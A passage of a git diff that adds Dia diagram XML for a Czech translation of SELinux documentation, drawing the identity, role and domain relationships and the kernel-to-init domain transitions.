+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O2" connection="13"/>
+        <dia:connection handle="1" to="O4" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O15">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,13.505"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,13.455;6.8618,15.9868"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,13.505"/>
+        <dia:point val="6.5,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O5" connection="13"/>
+        <dia:connection handle="1" to="O6" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O16">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.725,13.505"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="13.3632,13.455;14.0868,15.9868"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="13.725,13.505"/>
+        <dia:point val="13.725,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O4" connection="13"/>
+        <dia:connection handle="1" to="O7" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O17">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,4.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,3.655;23.52,4.4"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Unix users#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,4.25"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O18">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,8.09"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,7.47637;23.1936,9.07725"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#SELinux
+Identities#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,8.09"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O19">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,12.74"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,12.1264;21.7111,12.9273"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Roles#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,12.74"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O20">
+      <dia:attribute name="obj_pos">
+        <dia:point val="19.725,16.99"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="19.725,16.3764;22.4911,17.1772"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Domain#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="19.725,16.99"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O21">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,13.8575"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,13.8075;21.3118,15.8693"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,13.8575"/>
+          <dia:point val="20.95,15.7575"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O22">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,14.8075"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,14.4071;25.2636,15.2079"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to one#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,15.0207"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O23">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,9.8075"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,9.7575;21.3118,11.8193"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,9.8075"/>
+          <dia:point val="20.95,11.7075"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O24">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,10.7575"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,10.3571;24.5511,11.1579"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to N#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,10.9707"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+    <dia:group>
+      <dia:object type="Standard - Line" version="0" id="O25">
+        <dia:attribute name="obj_pos">
+          <dia:point val="20.95,5.33625"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="20.5882,5.28625;21.3118,7.34805"/>
+        </dia:attribute>
+        <dia:attribute name="conn_endpoints">
+          <dia:point val="20.95,5.33625"/>
+          <dia:point val="20.95,7.23625"/>
+        </dia:attribute>
+        <dia:attribute name="numcp">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow">
+          <dia:enum val="22"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_length">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+        <dia:attribute name="end_arrow_width">
+          <dia:real val="0.5"/>
+        </dia:attribute>
+      </dia:object>
+      <dia:object type="Standard - Text" version="1" id="O26">
+        <dia:attribute name="obj_pos">
+          <dia:point val="21.7,6.28625"/>
+        </dia:attribute>
+        <dia:attribute name="obj_bb">
+          <dia:rectangle val="21.7,5.88581;25.2636,6.68669"/>
+        </dia:attribute>
+        <dia:attribute name="text">
+          <dia:composite type="text">
+            <dia:attribute name="string">
+              <dia:string>#One to one#</dia:string>
+            </dia:attribute>
+            <dia:attribute name="font">
+              <dia:font family="sans" style="0" name="Helvetica"/>
+            </dia:attribute>
+            <dia:attribute name="height">
+              <dia:real val="0.80000000000000004"/>
+            </dia:attribute>
+            <dia:attribute name="pos">
+              <dia:point val="21.7,6.49944"/>
+            </dia:attribute>
+            <dia:attribute name="color">
+              <dia:color val="#000000"/>
+            </dia:attribute>
+            <dia:attribute name="alignment">
+              <dia:enum val="0"/>
+            </dia:attribute>
+          </dia:composite>
+        </dia:attribute>
+        <dia:attribute name="valign">
+          <dia:enum val="2"/>
+        </dia:attribute>
+      </dia:object>
+    </dia:group>
+  </dia:layer>
+</dia:diagram>
diff --git a/tmp/cs-CZ/xml/images/selinux-context.png b/tmp/cs-CZ/xml/images/selinux-context.png
new file mode 100644
index 000000000..debe7305d
Binary files /dev/null and b/tmp/cs-CZ/xml/images/selinux-context.png differ
diff --git a/tmp/cs-CZ/xml/images/selinux-transitions.dia b/tmp/cs-CZ/xml/images/selinux-transitions.dia
new file mode 100644
index 000000000..91f55fb86
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/selinux-transitions.dia
@@ -0,0 +1,741 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<dia:diagram xmlns:dia="http://www.lysator.liu.se/~alla/dia/">
+  <dia:diagramdata>
+    <dia:attribute name="background">
+      <dia:color val="#ffffff"/>
+    </dia:attribute>
+    <dia:attribute name="pagebreak">
+      <dia:color val="#000099"/>
+    </dia:attribute>
+    <dia:attribute name="paper">
+      <dia:composite type="paper">
+        <dia:attribute name="name">
+          <dia:string>#A4#</dia:string>
+        </dia:attribute>
+        <dia:attribute name="tmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="bmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="lmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="rmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="is_portrait">
+          <dia:boolean val="true"/>
+        </dia:attribute>
+        <dia:attribute name="scaling">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="fitto">
+          <dia:boolean val="false"/>
+        </dia:attribute>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="grid">
+      <dia:composite type="grid">
+        <dia:attribute name="width_x">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="width_y">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_x">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_y">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:composite type="color"/>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="color">
+      <dia:color val="#d8e5e5"/>
+    </dia:attribute>
+    <dia:attribute name="guides">
+      <dia:composite type="guides">
+        <dia:attribute name="hguides"/>
+        <dia:attribute name="vguides"/>
+      </dia:composite>
+    </dia:attribute>
+  </dia:diagramdata>
+  <dia:layer name="Arrière-plan" visible="true" active="true">
+    <dia:object type="Flowchart - Box" version="0" id="O0">
+      <dia:attribute name="obj_pos">
+        <dia:point val="3.0825,2.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="3.0325,2.2;6.775,5"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="3.0825,2.25"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.6425000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Kernel
+kernel_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,3.395"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O1">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.90375,0.839375"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="2.59375,0.244375;7.21375,1.78938"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Processes
+and domains#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,0.839375"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O2">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.3498,0.848125"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="11.2048,0.2345;15.5134,1.83537"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Objects and
+types#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3498,0.848125"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O3">
+      <dia:attribute name="obj_pos">
+        <dia:point val="3.10375,6.045"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="3.05375,5.995;6.75375,8.795"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="3.10375,6.045"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.6000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Init
+init_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,7.19"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O4">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7736,2.89"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.7236,2.84;15.9936,6.25995"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7736,2.89"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.1699999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/sbin/init
+init_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,3.89355"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O5">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.725,3.6"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.67485,3.2485;10.8854,3.9721"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.725,3.6"/>
+        <dia:point val="10.7736,3.61213"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O0" connection="8"/>
+        <dia:connection handle="1" to="O4" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O6">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7736,5.0564"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.60026,4.9912;10.8388,6.83278"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.7736,5.0564"/>
+        <dia:point val="6.70375,6.72"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O4" connection="7"/>
+        <dia:connection handle="1" to="O3" connection="6"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O7">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7486,7.0125"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.6986,6.9625;16.0186,10.3824"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7486,7.0125"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.2200000000000006"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/etc/init.d/rcS
+initrc_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,8.01605"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O8">
+      <dia:attribute name="obj_pos">
+        <dia:point val="2.0075,9.84"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="1.9575,9.79;7.85,12.59"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="2.0075,9.84"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.7924999999999995"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Startup scripts
+initrc_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,10.985"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O9">
+      <dia:attribute name="obj_pos">
+        <dia:point val="8.05,3.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="8.05,2.655;9.5425,3.4"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#exec#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="8.05,3.25"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O10">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.75,7.7"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.69957,7.36754;10.8604,8.09112"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.75,7.7"/>
+        <dia:point val="10.7486,7.73463"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="1" to="O7" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O11">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7486,9.1789"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.69816,9.11272;10.8148,10.6067"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.7486,9.1789"/>
+        <dia:point val="7.8,10.515"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
